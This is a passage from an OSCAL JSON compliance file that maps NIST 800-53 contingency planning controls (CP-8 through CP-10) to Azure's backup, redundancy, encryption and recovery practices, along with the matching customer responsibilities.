Azure is responsible for defining its own routing priority based on property availability requirements and emergency purposes. In the cloud environment, there is no priority order because there are different teams to bring each specific component back online in the Recovery Time Objectives (RTOs) defined for each service. Azure can define its own routing priority based on property availability requirements and emergency purposes."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"7d236627-0756-4038-8523-e5bf62fa9a9d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-042"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.1_smt.b","by-components":[{"uuid":"c4d2595d-4d63-4b5d-8add-0c4859b0904d","export":{"provided":[{"uuid":"8cd43acc-2e3d-4a12-8009-69c78dd261c7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-042"}],"description":"Network routing for Azure datacenters is proprietary, and therefore a Service Priority setting for emergency purposes is not required. Azure is responsible for defining its own routing priority based on property availability requirements and emergency purposes. In the cloud environment, there is no priority order because there are different teams to bring each specific component back online in the Recovery Time Objectives (RTOs) defined for each service. 
Azure can define its own routing priority based on property availability requirements and emergency purposes."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"011f8921-6436-4931-8c05-44dae17b8da2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-8.2","statements":[{"uuid":"287c2042-c140-4418-bcd7-9dfabc5df387","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-043"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.2_smt","by-components":[{"uuid":"fcd0a7c6-268e-41a7-938b-e3fcb890570f","export":{"provided":[{"uuid":"038ab551-cbf0-483c-8249-5fdedac7dfd7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-043"}],"description":"Azure mitigates the risk of single points of failures with telecommunication links by requiring each Azure datacenter to have at least two (2) diverse fiber paths. Microsoft maintains its own fiber network whose purpose is to exclusively support Microsoft properties, acting as a global fiber backbone comparable to multiple ISPs. Azure contracts with multiple carriers to provide field service maintenance in the event of faults, defects, or failures. 
The service level objective with the carriers for on-demand maintenance and critical time to repair is twenty-four (24) hours."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"e70134e3-2d1d-4f3f-bc53-7885ec1c096d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-8.3","statements":[{"uuid":"95747048-6955-4e84-8840-fa136ca9f1f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-044"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.3_smt","by-components":[{"uuid":"bcd414e0-dcd1-425d-adf0-f3ad8cd200e2","export":{"provided":[{"uuid":"af84de17-880d-49b4-962c-1b0b8619ff2f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-044"}],"description":"Azure mitigates the risk of single points of failures with telecommunication links by requiring each Azure datacenter to have at least two (2) separate fiber paths. The redundant communication links are established following disparate paths through the Microsoft fiber network. 
This is a continuously operational solution managed by Azure."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"5e9a9e17-c605-454c-a501-b3183435dfad","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-8.4","statements":[{"uuid":"17e67d9f-ab06-49c1-bb31-c94ff69eb9cb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-045"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.4_smt.a","by-components":[{"uuid":"8510129f-cd6c-471a-a9df-be6528ccc1bf","export":{"provided":[{"uuid":"85b062ac-7930-411d-8e10-e6df77081ddb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-045"}],"description":"Azure does not rely on contingency plans for individual ISPs to maintain telecommunications. Microsoft implements diverse fiber routes that automatically transfer transmissions during outages. 
In addition, Microsoft has contracts and SLAs to ensure timely remediation of any issues."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"cb5349a6-0d89-429e-9c64-55b9b467580c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-046"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.4_smt.b","by-components":[{"uuid":"3df9a5ee-8446-47af-a237-a49885bfab45","export":{"provided":[{"uuid":"9b17b1cb-0e38-4ef8-8a30-1ac29703c26c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-046"}],"description":"Azure does not rely on contingency plans for individual ISPs to maintain telecommunications. Microsoft implements diverse fiber routes that automatically transfer transmissions during outages. In addition, Microsoft has contracts and SLAs to ensure timely remediation of any issues."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"cbb92efe-7b62-4819-ad4d-bc8ed1822c6d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-047"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.4_smt.c","by-components":[{"uuid":"0b216d92-f005-4626-a80a-4d6f84d044b2","export":{"provided":[{"uuid":"dc909b9a-119c-4301-ad79-67bb071882f1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-047"}],"description":"Azure does not rely on contingency plans for individual ISPs to maintain telecommunications. Microsoft implements diverse fiber routes that automatically transfer transmissions during outages. 
In addition, Microsoft has contracts and SLAs to ensure timely remediation of any issues."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"ab08471e-1b52-4444-9181-d5322e830b9d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-9","statements":[{"uuid":"67c6123a-60a3-4dc2-ba0c-d3930919c5fd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-048"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9_smt.a","by-components":[{"uuid":"cd1dc602-5bd0-4085-80c6-5dad5e721885","export":{"provided":[{"uuid":"e879e119-1539-48bd-ba2f-50d947bc6209","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-048"}],"description":"For user-level information stored in Azure Storage, data is synchronously replicated locally using Locally Redundant Storage (LRS), which provides redundancy equivalent to three copies. In addition, data is asynchronously replicated to a separate datacenter in the zone or to a remote region for accounts which have configured Zone-Redundant Storage (ZRS), Geo-Redundant Storage (GRS), or Read-Access Geo-Redundant Storage (RA-GRS). The backups sent to Azure Storage are encrypted using Federal Information Processing Standards (FIPS) 140-2 compliant AES 256-bit encryption. There are three types of backups - Customer Machine, Disk Pod, and Tape. For Customer Machine and Disk Pod backups, the data is tied together in a location and retained for seven (7) days. 
Disk Pods back up to Blob storage, in which there are two accounts, ensuring that data is backed up into two accounts in different regions. For tape backup, the Data Protection Services (DPS) policies and procedures describe the roles, responsibilities, and services for the backup standards, retention policies, monitoring, and reports available to customers. All information backed up and stored uses the Data Type Classification according to the Corporate, External and Legal Affairs (CELA) Data Classification. Service teams are required to identify the Data Type Classification that in turn drives the appropriate retention and storage policy assigned. The default settings include a full backup once a week and a nightly differential backup. If the backup schedule needs changing based on customer requirements, a workflow ticket is opened requesting the change. The ticket is reviewed and approved by DPS prior to instituting the change. Backup tapes are moved to an off-site facility for long term storage. The scalar tape backup library, encryption device, and servers are in each applicable datacenter. The secure offsite backup process consists of the following: * Off-site containers are stored within the datacenter. * The containers are loaded within the datacenter by authorized personnel. * All tapes are placed inside the containers for transport. * Containers are locked by authorized personnel. * CommVault Simpana Software is used to track the tape numbers through a vault report. Along with the CommVault Simpana vault report, a workflow ticket is created to track the tapes, their transport, and the personnel involved. The tracking is to ensure location of the tapes in the event a recovery is requested. * The off-site vendor retrieves the containers according to a schedule specified by DPS. * The locked containers are stored within the datacenter until an off-site vendor representative can retrieve the tape containers. 
* When the off-site vendor picks up the tape containers, they are not allowed to enter any datacenter, as mandated by security. The tape containers are brought to the lobby for the exchange. * Authorized personnel who handle the tapes are required to have an authorization account with the off-site vendor. This account includes a unique account number that is tracked by the off-site vendor when tapes are exchanged. * If tapes need to be retrieved for recovery purposes, authorized personnel can request the tape from off-site storage. All recovery requests are initiated by the customer by opening a workflow ticket. This ticket allows tracking of the entire recovery process. Expired tapes are tracked by vaulting and the off-site vendor. Tapes are returned to the datacenter on the day of expiration."}],"responsibilities":[{"uuid":"ea905c6f-8269-4a8c-a773-939d6959c687","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-048"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for conducting backups of user-level information in customer-deployed resources at a frequency consistent with customer-defined RTOs and RPOs. 
Note: if the customer configures Azure backup services appropriately, Azure can support data loss prevention.","provided-uuid":"e879e119-1539-48bd-ba2f-50d947bc6209"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4990d154-321d-4dca-9607-38e01c278bfc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-049"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9_smt.b","by-components":[{"uuid":"afdf78ed-3eda-422a-8529-1e7227f4c004","export":{"provided":[{"uuid":"d8a5c352-2218-4ae2-943a-a73e5165d685","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-049"}],"description":"System-level information is backed up using Azure Storage continuous replication detailed above. System-level information, defined as system-state information, operating system and application software, and licenses, is maintained in a variety of ways, but is backed by Azure Storage, which utilizes LRS, ZRS, and GRS. Server, network device, and service code is maintained in Azure DevOps, which is backed up and redundant. Azure DevOps uses Azure Storage as the primary repository for service metadata and data. 
For additional information on DevOps, please see the link below: <https://docs.microsoft.com/en-us/azure/devops/organizations/security/data-protection?view=azure-devops#data-availability>"}],"responsibilities":[{"uuid":"a61f0738-4e24-417a-985c-f7164a73d19f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-049"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for conducting backups of system-level information in customer-deployed resources at a frequency consistent with customer-defined RTOs and RPOs. Note: if the customer configures Azure backup services appropriately, Azure can support data loss prevention.","provided-uuid":"d8a5c352-2218-4ae2-943a-a73e5165d685"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1f9832c7-ff42-4055-8f72-db38ffd469f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-050"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9_smt.c","by-components":[{"uuid":"6c9800b0-c4b0-4e31-a10c-582538787204","export":{"provided":[{"uuid":"d4f0b66c-b41d-4467-ad3c-77da32ee2a58","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-050"}],"description":"Information system documentation and security-related documentation are stored on SharePoint. SharePoint backups are managed by Core Services Engineering and Operations (CSEO). 
Backup frequency is based on requirements defined by the BIA."}],"responsibilities":[{"uuid":"cbb081fc-f5e5-4134-a4ca-d498c2a0d442","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-050"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for conducting backups of system documentation information in customer-deployed resources at a frequency consistent with customer-defined RTOs and RPOs. Note: if the customer configures Azure backup services appropriately, Azure can support data loss prevention.","provided-uuid":"d4f0b66c-b41d-4467-ad3c-77da32ee2a58"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b8862a74-687e-494f-af3b-aff23a49d39b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-051"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9_smt.d","by-components":[{"uuid":"3615a7c8-0922-49b6-a787-552b2e6b8154","export":{"provided":[{"uuid":"60b71124-701a-4428-90d5-fc38bec9d8c4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-051"}],"description":"Azure protects the confidentiality and integrity of all information in accordance with Federal Information Processing Standards (FIPS) 140-2 primarily through the automatic encryption of data uploaded to Azure Storage. In addition, communications between the Azure service offerings are configured to require Federal Information Processing Standards (FIPS) 140-2 compliant TLS 1.2/1.3. 
As part of the drive to ensure that Microsoft is only using cryptographically secure protocol versions, all teams within Azure are provided guidance to deprecate older protocols and ciphers. Service Teams are only allowed to leverage TLS 1.2/1.3 and higher protocols for both incoming and outgoing connections. Azure leverages a Key Performance Indicator (KPI) alerting system to ensure service teams are only leveraging TLS 1.2/1.3 and higher protocols. The KPIs are alerted to Azure service and leadership teams for action. Azure enforces key communications between Azure internal components to be protected with self-signed SSL certificates."}],"responsibilities":[{"uuid":"99d1240b-276b-4ddc-9ba1-060f5ab9b9ce","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-051"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting the confidentiality, integrity, and availability (CIA) of customer-controlled backup data. Note: if the customer configures Azure backup services appropriately, Azure can support the protection of backup data.","provided-uuid":"60b71124-701a-4428-90d5-fc38bec9d8c4"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"47fc4d5d-aa8a-44ae-b8d3-27d0bda9a889","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-9.1","statements":[{"uuid":"8b403495-5045-4ce5-ac15-17a2ad6dc562","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-052"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9.1_smt","by-components":[{"uuid":"1955af72-d15f-4d90-9368-253290c85f0e","export":{"provided":[{"uuid":"1d4dbceb-05c3-4046-a31d-e1dbf433aff6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-052"}],"description":"Azure monitors all backups of the system and the customer images on a continuous basis using system-generated alerts which notify the Azure service teams of any failed or incomplete backups. Azure Storage automatically addresses backup issues as they arise. If a backup continuously fails, Azure creates an IcM incident ticket to track and resolve the issue. In addition to system-generated alerts, restoration tests of customer-requested restores are performed using the BCDR Program in the Azure Global Portal. The integrity of data is automatically confirmed upon completion of the backup. The restoration tests are captured and stored in the BCDR Program in the Azure Global Portal to generate reports and perform root-cause analysis, as needed. In addition, Azure can test backups for information integrity by request from the customer. 
A workflow ticket must be submitted by the customer to initiate the request to test backups."}],"responsibilities":[{"uuid":"58ee75c4-e4f4-46c0-ac8f-53ffc5ba76e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-052"}],"description":"The customer is responsible for backing up customer data and applications. The customer is also responsible for testing those backups. Additionally, as detailed below, the customer is responsible for requesting a test of the backup of their image as systemically created by the Microsoft Azure DPS team.","provided-uuid":"1d4dbceb-05c3-4046-a31d-e1dbf433aff6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5d17bdc8-ec31-4d53-824c-a04a804ebdb6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-9.2","statements":[{"uuid":"830e1180-d351-4e39-98e5-0e0dd3c7393c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-053"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9.2_smt","by-components":[{"uuid":"5de48b82-e447-4564-945f-00abfe49d2de","export":{"provided":[{"uuid":"5d662a1c-c298-4a14-9c17-cedd248d28c1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-053"}],"description":"The nature of functional business continuity and disaster recovery (BCDR) testing ensures that the redundancy built into the annual BCDR service team testing is fully addressed. 
This redundancy includes using actual backup information in the form of redundant processing being tested."}],"responsibilities":[{"uuid":"cf20fb43-9513-4dfc-b516-c292fbe9d739","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-053"}],"description":"The customer is responsible for testing backup information. Azure can support the testing of backup information if the customer configures Azure backup services appropriately.","provided-uuid":"5d662a1c-c298-4a14-9c17-cedd248d28c1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"757d3967-4c25-488c-872d-3824701bd6c2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-9.3","statements":[{"uuid":"9da0b786-3337-4980-bdb7-332b6eb2e3a8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-054"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9.3_smt","by-components":[{"uuid":"bf267d6b-75e1-445f-b721-3a74b03f11b5","export":{"provided":[{"uuid":"e93381bd-5550-40a1-a194-dfb3c90496b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-054"}],"description":"All Azure server, network device, and service code is backed up in Azure DevOps. Multiple backups exist in geo-diverse locations. All Azure datacenters can be used as alternate processing sites, and each site has the necessary agreements in place to transfer and resume services logically without equipment transfer. 
Azure service teams determine recovery objectives following the Business Impact Analysis (BIA) process and services are designed and tested to meet objectives, following the Azure Business Continuity Management (BCM) process."}],"responsibilities":[{"uuid":"bc1e94b1-35cf-487a-8276-4e0a2a0b8c78","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-054"}],"description":"The customer is responsible for separately storing backup information (e.g., separate facility or fire-rated container that is not collocated). Note: if the customer configures Microsoft Azure backup services appropriately, Azure can support the protection of backup data.","provided-uuid":"e93381bd-5550-40a1-a194-dfb3c90496b5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"41557908-26a3-491e-8fbf-1e66fb9fde2d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-9.5","statements":[{"uuid":"ee9dc4cb-2855-49c3-922b-19cb4722018f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-055"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9.5_smt","by-components":[{"uuid":"8eaa132d-fd5d-4b47-a69a-47039f71941a","export":{"provided":[{"uuid":"20d1a3c5-fec4-4e14-a3de-d212f2123077","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-055"}],"description":"Azure establishes alternate storage sites at geographically distributed Azure datacenters. 
Data durability is obtained by synchronously replicating data across different databases in the same datacenter and across multiple datacenters. Disaster recovery is achieved by asynchronous replication to a datacenter in a different geographical region. Azure datacenters are redundant and services are mirrored in geographically redundant datacenters. All sites are active and both sites in a redundant pair contain the backed-up data."}],"responsibilities":[{"uuid":"f4212825-3565-47d1-9594-2bf50c5d5c05","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-055"}],"description":"The customer is responsible for transferring backup information to an alternate storage site. Azure can support the storage of backup data if the customer configures Microsoft Azure backup services appropriately. Microsoft Azure automatically copies the backups of the customer data to the storage site within the same datacenter. These backups are automatically geo-replicated to the alternative storage site in different geographic regions. If the datacenter hosting the customer data fails, the customer can utilize the Microsoft Azure Management Portal or programmatic API to restore their data from the geo-replicated backup to any geographic region of their choice. Additional information about how customers can restore data can be found here: https://docs.microsoft.com/en-us/azure/sql-database/sql-database-recovery-using-backups. 
In the case of failure at the customer's primary datacenter, the customer is responsible for restoring their data from backups to an alternative datacenter.","provided-uuid":"20d1a3c5-fec4-4e14-a3de-d212f2123077"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"286c43c7-8c49-45b5-ba7f-66265a81ab09","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-9.8","statements":[{"uuid":"372c9d75-79dd-4963-a81f-06d76c6e8cab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-056"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9.8_smt","by-components":[{"uuid":"fa20fae2-d475-443b-9f78-239d400a5bfb","export":{"provided":[{"uuid":"7718d46c-0038-4e27-b6bb-1b29f83056e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-056"}],"description":"Azure protects the confidentiality and integrity of all information in accordance with Federal Information Processing Standards (FIPS) 140-2 primarily through the automatic encryption of data uploaded to Azure Storage. In addition, communications between the Azure service offerings are configured to require Federal Information Processing Standards (FIPS) 140-2 compliant TLS 1.2/1.3. As part of the drive to ensure that Microsoft is only using cryptographically secure protocol versions, all teams within Azure are provided guidance to deprecate older protocols and ciphers. 
Service Teams are only allowed to leverage TLS 1.2/1.3 and higher protocols for both incoming and outgoing connections. Azure leverages a Key Performance Indicator (KPI) alerting system to ensure service teams are only leveraging TLS 1.2/1.3 and higher protocols. KPI alerts are raised to Azure service and leadership teams for action. Azure enforces that key communications between Azure internal components are protected with self-signed SSL certificates."}],"responsibilities":[{"uuid":"a08fdd38-04e1-4412-9e72-4c79b3073bc9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-056"}],"description":"The customer is responsible for implementing cryptographic mechanisms to prevent unauthorized disclosure and modification of defined backup information housed in customer-deployed resources.","provided-uuid":"7718d46c-0038-4e27-b6bb-1b29f83056e0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"41ce8d83-332f-48c9-bf27-e0320b9c9b71","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-10","statements":[{"uuid":"3a594b63-cd14-49cd-af58-231c120d978e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-057"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-10_smt","by-components":[{"uuid":"579f33c9-42d5-41c7-b197-82a39e908d6c","export":{"provided":[{"uuid":"a4315736-64be-4b54-81d3-14966d3a9534","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-057"}],"description":"All 
services are designed to be as redundant as needed by their region recovery classification. Because of this redundancy, the main recovery and reconstitution actions would take place at the damaged datacenter. Following an assessment of the damage to the datacenter, Azure plans a date for relocation of services using a phased approach. Azure prepares a schedule detailing when particular services are to relocate back to the rebuilt datacenter. Some key factors that are considered when scheduling the move are: * Ensuring the necessary core platforms and communications links are in place before restoration of the individual service teams. * Ensuring the supported tools are in place to support restoration. * Where different services are interdependent (e.g., data is passed to/from the services), restoring them to a consistent point in time and relocating them together. A detailed checklist for recovery and reconstitution of the datacenter can be found in the Datacenter Business Resilience Plan (DC BRP). Each datacenter has its own unique DC BRP."}],"responsibilities":[{"uuid":"9759be78-08f9-48af-b462-6f7e8ccb375a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-057"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for the recovery and reconstitution of customer-deployed resources after a disruption, compromise, or failure. 
Note: if the customer configures Azure backup and/or alternate site processing services appropriately, Azure can support the continued operation of customer-deployed resources.","provided-uuid":"a4315736-64be-4b54-81d3-14966d3a9534"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7dd5a0ef-9fa5-409e-bfb6-40bf2cb8683f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-10.2","statements":[{"uuid":"1705d105-1e8b-461d-9486-5c173ff6d7fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-058"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-10.2_smt","by-components":[{"uuid":"8bc61f3d-28d6-43a1-96f4-e98bdb8df263","export":{"provided":[{"uuid":"eb27c1db-5bac-412d-a84c-58731e4c8758","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-058"}],"description":"Currently there are no transaction-based systems in the Azure environment. The primary and alternate sites are operational, management, and technical mirrors. Therefore, the need to recover and reconstitute information systems during significant contingency events is eliminated. Instead of using transaction journaling, Azure uses live replicated databases. MySQL uses transaction journaling while Microsoft SQL uses transaction logs. Transaction logging is a core function of the SQL engine and cannot be disabled. 
